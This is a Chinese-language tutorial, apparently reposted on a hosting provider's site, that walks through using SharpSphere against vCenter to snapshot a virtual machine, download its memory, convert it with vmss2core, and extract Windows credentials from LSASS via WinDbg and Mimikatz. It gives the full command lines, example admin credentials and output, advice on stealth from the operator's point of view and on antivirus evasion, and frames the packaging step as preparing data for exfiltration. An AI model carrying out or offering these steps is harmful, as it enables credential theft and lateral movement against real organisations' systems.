您好,登录后才能下订单哦!
这篇文章主要介绍“如何理解SharpSphere dump LSASS内存”,在日常操作中,相信很多人在如何理解SharpSphere dump LSASS内存问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”如何理解SharpSphere dump LSASS内存”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
但是到现在为止,在实际操作上很难发挥作用,主要原因是:
1.需要验证vCenter/ESXi
2.为目标VM创建带有内存的的快照
3.需要将数据下载到本地,(通常非常大)
.vmem
和.vmsn
文件4.通过Volatility来运行
5.使用vmss2core转换为
.dmp
并通过Mimikatz 和 WinDbg运行
Z:\>SharpSphere.exe dump --help SharpSphere 1.0.0.0 Copyright © 2020 --url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk --username Required. vCenter username, i.e. administrator@vsphere.local --password Required. vCenter password --targetvm Required. VM to snapshot --snapshot (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from last existing snapshot, or none if no snapshots are available. --destination Required. Full path to the local directory where the file should be downloaded --help Display this help screen. --version Display version information.
默认情况下,SharpSphere不会试图创建一个快照,而会试图从现有的快照找到有效.vmem
和.vmsn
文件。从OpSec的角度来看,这是可取的,因为UI中没有证据,但是不能保证目标上有快照,而且这些快照有没有捕获了VM的内存也是问题。所以如果现有快照不存在,SharpSphere将退出。
所以--snapshot
参数规定,SharpSphere会创建一个名为System Backup [TIMESTAMP]
的快照,下载相关联的“.vmem
和.vmsn
文件,然后删除快照一旦完成。Recent Tasks
窗口中的其他用户将同时看到快照的创建和删除。
当然--snapshot
可以先查看是否存在现有快照
SharpSphere需要从快照下载两个文件,一个大小等于分配给该机器的RAM的(即4GB,8GB,16GB等)的.vmem
文件,以及一个小得多的.vmsn
文件。它将这些文件下载到--destination
指定的目录中。但下载完这两个文件,SharpSphere会将它们都添加到具有随机名称的zip文件中,然后将其删除。
1.使用以下参数执行SharpSphere(提示:使用获取虚拟机名称list):
SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES]
示例输出
C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Finding existing snapshots for Windows 10... Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set
2.如果不存在快照,添加一个参数--snapshot
SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Creating snapshot for VM Windows 10... [x] Snapshot created successfully [x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz... [x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv... [x] Download complete, zipping up so it's easier to exfiltrate... [x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz [x] Deleting the snapshot we created
3.如果你使用cs之类的工具,可以直接在目标机器上加载远程加载程序。或者,将工具上传到目标机上,但要做好免杀处理。
4.在这种情况下cec0kwgk.b2m
,将随机重命名为zip文件,然后解压缩这两个文件。较大的是您的.vmem
文件。
5.下载vmss2core并先提供较小的.vmsn
文件,然后再提供较大的.vmem
文件。如果目标VM是Microsoft Windows 8 / 8.1,Windows Server 2012,Windows Server 2016或Windows Server 2019,则执行以下命令-W8
:
vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz
否则使用-W
:
vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz
6.下载WinDbg并加载.dmp
文件。vmss2core Crash Dump
7.下载Mimikatz并使用WinDbg加载Mimilib.dll
.load C:\Tools\Mimikatz\x64\mimilib.dll
8.查找LSASS 进程
!process 0 0 lsass.exe
9.切换进程
.process /r /p ffffc70462d020c0
10.获取凭证
!mimikatz
到此,关于“如何理解SharpSphere dump LSASS内存”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注亿速云网站,小编会继续努力为大家带来更多实用的文章!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。